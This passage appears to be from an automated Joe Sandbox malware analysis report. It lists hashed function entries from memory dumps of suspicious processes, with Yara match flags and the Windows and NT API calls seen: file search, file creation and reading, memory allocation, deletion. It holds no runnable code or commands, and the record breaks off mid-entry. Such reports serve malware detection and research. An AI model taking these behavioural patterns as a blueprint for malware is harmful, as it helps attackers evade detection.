                                                                      • API ID:
                                                                      • String ID: .$P$e$i$m$o$r$x
                                                                      • API String ID: 0-620024284
                                                                      • Opcode ID: d741c1a7e325a897b24961f9157b93f2af8c94c8219dbdd606332e5c104ea199
                                                                      • Instruction ID: 1cef3e632dc3e549f73265697464d461140e5a50feb8066446b1e06375b79a72
                                                                      • Opcode Fuzzy Hash: d741c1a7e325a897b24961f9157b93f2af8c94c8219dbdd606332e5c104ea199
                                                                      • Instruction Fuzzy Hash: E241B7B580032876EB25DBA1DC44FEF7B7CAF54300F40859DA50D5B180EBB457898FA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4p{+$F$P$T$f$r$x
                                                                      • API String ID: 0-3640315310
                                                                      • Opcode ID: 9a2ebdbef0b99e5a10841743b3abcbd673b31e16dc9695151f2fdbf78eb533b2
                                                                      • Instruction ID: 31cb3eda84f6eb370a8db04db283160575d9c4fbce9b85838e8c85a54c21c7b9
                                                                      • Opcode Fuzzy Hash: 9a2ebdbef0b99e5a10841743b3abcbd673b31e16dc9695151f2fdbf78eb533b2
                                                                      • Instruction Fuzzy Hash: E6512674900704AEDB35DFA5CD44BEAF7F8BF44700F184A5EE14AAA280EBF46654CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: L$S$\$a$c$e$l
                                                                      • API String ID: 0-3322591375
                                                                      • Opcode ID: fe5db8e23601e4186cb554101e2d9db36515e5ba38ae3d582012475074512604
                                                                      • Instruction ID: d7c3f31f86c9fb84fb84e4f0c160ce2dcaf2c550e9218672da839a45eecace78
                                                                      • Opcode Fuzzy Hash: fe5db8e23601e4186cb554101e2d9db36515e5ba38ae3d582012475074512604
                                                                      • Instruction Fuzzy Hash: A6418776C04318AEDB14DFA5DC84AEEBBF8EF48300F05465ED909AB200E7715945CF94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (HD$(HD$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                      • API String ID: 0-2079321013
                                                                      • Opcode ID: 3b479194db246e721b0cf36dffb93665d1934851b30c6c3aae27d9c50761d141
                                                                      • Instruction ID: 7695a6ba825b4678e380fac508cc10d40cec1fd5e3e233188aee2f9e4770c4ce
                                                                      • Opcode Fuzzy Hash: 3b479194db246e721b0cf36dffb93665d1934851b30c6c3aae27d9c50761d141
                                                                      • Instruction Fuzzy Hash: 23411E75911A287AEB02EB92CC41FEF7F7CAF55700F054149FA046E280DB746A158BEA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $i$l$o$u
                                                                      • API String ID: 0-2051669658
                                                                      • Opcode ID: 68119f6f0bdfbf27130196f93642d0598cfa610fc5c6b142c558021d3ac22b88
                                                                      • Instruction ID: 91bca7fdd503fd010696b9773febf0d5c64898051e34444b7cc3216d1f2b5a64
                                                                      • Opcode Fuzzy Hash: 68119f6f0bdfbf27130196f93642d0598cfa610fc5c6b142c558021d3ac22b88
                                                                      • Instruction Fuzzy Hash: 19615EB5A00304AFDB24DBA4CC80FEFB7FCAB48710F24455DE55AA7240E775AA51CB60
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0$0$6$I$P
                                                                      • API String ID: 0-1705191920
                                                                      • Opcode ID: e96a8b5073693c2c9445f3224549f5bafb5a64d66ccb2c42678a453fc12a231e
                                                                      • Instruction ID: a4190f33daaf777e1d5d8e53ca1cefdbdf32f090bec9b19e38372909d421f665
                                                                      • Opcode Fuzzy Hash: e96a8b5073693c2c9445f3224549f5bafb5a64d66ccb2c42678a453fc12a231e
                                                                      • Instruction Fuzzy Hash: 9E2144B5D10619BBEB14DFA4CD41BFF77B8EF44304F044198E904AB280EB76AA058BE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $e$k$o
                                                                      • API String ID: 0-3624523832
                                                                      • Opcode ID: 773371ba4f55f4037f74141f88d1d30647f59001283d462b67b6c5c633f277ee
                                                                      • Instruction ID: c22477bdb0b60745191c8baf3141257704c4de7877b229a421e2f6cb88933577
                                                                      • Opcode Fuzzy Hash: 773371ba4f55f4037f74141f88d1d30647f59001283d462b67b6c5c633f277ee
                                                                      • Instruction Fuzzy Hash: BCB13DB5A00708AFDB24DBA4CC94FEFB7FDAF88700F14895CF61997244DA75AA418B50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $e$h$o
                                                                      • API String ID: 0-3662636641
                                                                      • Opcode ID: 50de49d425e6a7b3130c8a516f6aaf1771ba8071c549d01e269aeccb8e5958a5
                                                                      • Instruction ID: 389d385a55191b495bcf0bfb10bdce58c068f1057ad8a97f462fc5748fb5247f
                                                                      • Opcode Fuzzy Hash: 50de49d425e6a7b3130c8a516f6aaf1771ba8071c549d01e269aeccb8e5958a5
                                                                      • Instruction Fuzzy Hash: B28183B6C003686ADB65DB95CC85FEF777CAF48200F40429EE509AA140EF746B858FA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $e$k$o
                                                                      • API String ID: 0-3624523832
                                                                      • Opcode ID: 9abe870ce33fa3506fe4b538bda9a76fc4f349ec5d2d0577c0b8ed139352b3d6
                                                                      • Instruction ID: bc0b6502a27692cd241fb83743ae6b67369514c3719392f29b536cce991efd9c
                                                                      • Opcode Fuzzy Hash: 9abe870ce33fa3506fe4b538bda9a76fc4f349ec5d2d0577c0b8ed139352b3d6
                                                                      • Instruction Fuzzy Hash: 1F11A1B2900618ABDB14DF99DCC4ADEFBB9FF48304F04824DE915AF201E771A945CBA0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $e$k$o
                                                                      • API String ID: 0-3624523832
                                                                      • Opcode ID: cc2148a800722edc643bdfb50f2fc0ce077f3ac4c8142d9d4301f675b9da2037
                                                                      • Instruction ID: 558d29a61ccf29a2186be09ba2de3173cd56886bff3e8eb17bbd56759d101d4c
                                                                      • Opcode Fuzzy Hash: cc2148a800722edc643bdfb50f2fc0ce077f3ac4c8142d9d4301f675b9da2037
                                                                      • Instruction Fuzzy Hash: 8101C4B2900318ABDB14DF99DCC4ADEBBB9FF08304F04820DE9059F201E771A945CBA0

                                                                      Execution Graph

                                                                      Execution Coverage:2.6%
                                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                                      Signature Coverage:2.2%
                                                                      Total number of Nodes:463
                                                                      Total number of Limit Nodes:74

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d$&B$)$*#$1$:$:}$OV$Q$U$]$_$_-$_<$b*$e$i3$i:$v2
                                                                      • API String ID: 0-3217503214
                                                                      • Opcode ID: e84b1de85178849c5226fd967b2966ff36f4256e4bb59806103181765a7e37f8
                                                                      • Instruction ID: 008160bbba38df77e36209eef206972a0e667baa00ef17137c5a132ef73bc8b2
                                                                      • Opcode Fuzzy Hash: e84b1de85178849c5226fd967b2966ff36f4256e4bb59806103181765a7e37f8
                                                                      • Instruction Fuzzy Hash: 34329BB0905229CBEB64CF44CD98BEDBBB2FB44348F1481D9C1097B291DBB65A89CF54
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F7CD34
                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02F7CD6F
                                                                      • FindClose.KERNELBASE(?), ref: 02F7CD7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                      • Instruction ID: 10bba55d0254c4b187ad18934599d2e4480c0cf74012e49fb4563639de175b8f
                                                                      • Opcode Fuzzy Hash: 4c97a8d3e1393ac865fc2644c4165fbf533cb2054b97f8bd2608cce92750d3fe
                                                                      • Instruction Fuzzy Hash: 70319471A003487BDB20EF64CC85FFF777D9F44784F14415ABA19A6190DB70AB848BA0
                                                                      APIs
                                                                      • NtCreateFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?,?,?), ref: 02F89908
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                      • Instruction ID: a25292c215c2398164f683d6fa6a8bd80731b6e3bc504d8d7b371591fd78e893
                                                                      • Opcode Fuzzy Hash: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                      • Instruction Fuzzy Hash: C231E4B5A01248AFCB54DF98D880EEFB7B9EF88744F108109FA08A7340D770A851CFA0
                                                                      APIs
                                                                      • NtReadFile.NTDLL(?,?,59BA9130,?,?,?,?,?,?), ref: 02F89A53
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                      • Instruction ID: b886d1b8713c22a0daa6c909d65493bf65b7fae62038bf855b4453721358f997
                                                                      • Opcode Fuzzy Hash: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                      • Instruction Fuzzy Hash: 1731D6B5A00248ABDB14DF98CC81EEFB7B9EF89754F108209FD18A7344D770A9518FA1
                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(02F7240E,?,59BA9130,00000000,00000004,00003000,?,?,?,?,?,02F8860F,02F7240E,?,?,02F8BAEE), ref: 02F89D12
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                      • Instruction ID: 671efb1dba2c5e4492b4bdbbd6ef148cfa3b64b3e5f32e1a0db8ed3062b15537
                                                                      • Opcode Fuzzy Hash: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                      • Instruction Fuzzy Hash: A02119B5A00249ABDB10EF98CC41FAFB7B9EF89740F008109FE08A7344D674A9558FA1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                      • Instruction ID: ec4b5a5f2bf5cb550f0d064a7363c9e771be399eaac6ad404211760a92fe8a5d
                                                                      • Opcode Fuzzy Hash: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                      • Instruction Fuzzy Hash: 4E11A031600649BBD720EBA8CC41FEFB7ADDF85744F004109FA08A7280DAB5B9458BA1
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F89B34
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction ID: a242a03c857f8cbb7bdb74bc67342db0f6345e19148f93241a944ce86e396199
                                                                      • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                      • Instruction Fuzzy Hash: D2E046362012047BD620BA69CC40FEBB7ADDBC6B90F004419FB18A7242C6B1B9418AE1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9901b62a4c8f23a4fe6cbd3c4c25ad28f78207ad854601a5bebcfdcbea174615
                                                                      • Instruction ID: 870a1c6c4101df194517dc5420602f3a029b6a1835bfae14029fc228692a6191
                                                                      • Opcode Fuzzy Hash: 9901b62a4c8f23a4fe6cbd3c4c25ad28f78207ad854601a5bebcfdcbea174615
                                                                      • Instruction Fuzzy Hash: 9C9002626015004251407259984440E64159BE23013D5C159A0554570C86198955926D
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3af4f28e40afe0e6b0e8265529213beb581084910c85b2d264ad7afa991fe548
                                                                      • Instruction ID: d99f9a7a001adf0d213164886ec700437919f822b1a6aced1e9ebc65d715739a
                                                                      • Opcode Fuzzy Hash: 3af4f28e40afe0e6b0e8265529213beb581084910c85b2d264ad7afa991fe548
                                                                      • Instruction Fuzzy Hash: A790023260580012A140725998C454E44159BE1301B95C055E0424564C8A158A565365
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a10d0976964caded7a774208bfda7f518630bd2af9329c782a8f7ed5da132a8a
                                                                      • Instruction ID: 910ae837ec53f952ba6a8af1959438b237f8218837780cd3e23d5e95c31ac77d
                                                                      • Opcode Fuzzy Hash: a10d0976964caded7a774208bfda7f518630bd2af9329c782a8f7ed5da132a8a
                                                                      • Instruction Fuzzy Hash: DC90022A21340002E1807259A44860E04158BD2202FD5D459A0015568CC91689695325
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5da27dab1a0e32abc19fe7cc69b9013de4e6f315c00f645cd4ace79892912e6e
                                                                      • Instruction ID: b8fc544fed4613d9968d41ddf6554868db8ecc8c6a836b5f2f30876ddd083971
                                                                      • Opcode Fuzzy Hash: 5da27dab1a0e32abc19fe7cc69b9013de4e6f315c00f645cd4ace79892912e6e
                                                                      • Instruction Fuzzy Hash: 7E90022230140003E1407259A45860E4415DBE2301F95D055E0414564CD91689565226
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: fd69836bb988cc5c6de57b22c31e654c51a9fdceaa719b503f4bd3729a5cd9b8
                                                                      • Instruction ID: c1adc9413e0297eb0190f807603d2e62a8519314c849d0c52c3fc9618d8a56a0
                                                                      • Opcode Fuzzy Hash: fd69836bb988cc5c6de57b22c31e654c51a9fdceaa719b503f4bd3729a5cd9b8
                                                                      • Instruction Fuzzy Hash: CD900222242441526545B259944450F44169BE12417D5C056A1414960C85279956D625
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6de97141dea28b8f77364e695a8afd5aba96a6fc677a3cce05a9b68f96c8e6a3
                                                                      • Instruction ID: 556e7fd5e2ce0521db773ab8d99856d547a2c647f76b9fef5289e0d25740cebf
                                                                      • Opcode Fuzzy Hash: 6de97141dea28b8f77364e695a8afd5aba96a6fc677a3cce05a9b68f96c8e6a3
                                                                      • Instruction Fuzzy Hash: 8C90023220140413E1117259954470F04198BD1241FD5C456A0424568D96578A52A125
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6ac9e9330c29530ddf80805fc344bc58215ebc8d3529421e7c1ccdc4e905c180
                                                                      • Instruction ID: 07e44a6e47e66199f19bd57541ee6c5a11d37317b5141eca7dec8d3ec37da35e
                                                                      • Opcode Fuzzy Hash: 6ac9e9330c29530ddf80805fc344bc58215ebc8d3529421e7c1ccdc4e905c180
                                                                      • Instruction Fuzzy Hash: 7E90023220140842E10072599444B4E04158BE1301F95C05AA0124664D8616C9517525
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6ee98e8a8be4ad7114dc60c6c64c8022306e2931fb2316b3a8c652c3e26f61c1
                                                                      • Instruction ID: af0feb646712bea2b7cdec27be698524673ba3fe70e2dea06267b8f7954c0146
                                                                      • Opcode Fuzzy Hash: 6ee98e8a8be4ad7114dc60c6c64c8022306e2931fb2316b3a8c652c3e26f61c1
                                                                      • Instruction Fuzzy Hash: 6F90023220148802E1107259D44474E04158BD1301F99C455A4424668D869689917125
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: cec71253d6955d6f34182083adad639af42c3ff09c0312460a7fd6a28c9c55d4
                                                                      • Instruction ID: 8a53d5f4304bbcd9af2f5f839dda35175d9ae26769e172b3cf88b4ac4ce0c72f
                                                                      • Opcode Fuzzy Hash: cec71253d6955d6f34182083adad639af42c3ff09c0312460a7fd6a28c9c55d4
                                                                      • Instruction Fuzzy Hash: 8590023220140402E1007699A44864E04158BE1301F95D055A5024565EC66689916135
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bb534fa73e73db29aa9bd81ee7c5221146c5c458bf81ef756dd4988a06dff6bb
                                                                      • Instruction ID: 5899992be7bafe8dab30ea1e9499f696097385c7d242ef3cb3b0276bc10b3a0c
                                                                      • Opcode Fuzzy Hash: bb534fa73e73db29aa9bd81ee7c5221146c5c458bf81ef756dd4988a06dff6bb
                                                                      • Instruction Fuzzy Hash: 6990026234140442E10072599454B0E0415CBE2301F95C059E1064564D861ACD52612A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 69eabbfd20ac7448c4859db14bd70e0ab625556c3c5efc3cb05a831edf162156
                                                                      • Instruction ID: 28a2746c67e772a13c1cf6c32265591e1d61b85ecd3e622dcdd637e43e33b5ce
                                                                      • Opcode Fuzzy Hash: 69eabbfd20ac7448c4859db14bd70e0ab625556c3c5efc3cb05a831edf162156
                                                                      • Instruction Fuzzy Hash: 2B9002226014004251407269D88490E4415AFE2211795C165A0998560D855A89655669
                                                                      APIs
                                                                      Memory Dump Source
